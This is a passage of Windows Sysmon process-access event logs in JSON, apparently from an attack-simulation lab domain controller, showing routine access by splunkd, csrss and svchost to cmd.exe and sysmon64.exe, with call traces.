Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010D45B0300}","TargetProcessId":"3744","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f2b15|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1637,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.210\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-0010D45B0300}\r\nTargetProcessId: 3744\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.210","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010D45B0300}","TargetProcessId":"3744","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1638,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.210\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.210","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1639,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.210\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.210","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1640,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.224\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.224","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1641,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.224\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.224","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1642,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.224\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.224","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1643,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.224\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.224","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1644,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.224\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.224","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1645,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.224\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: 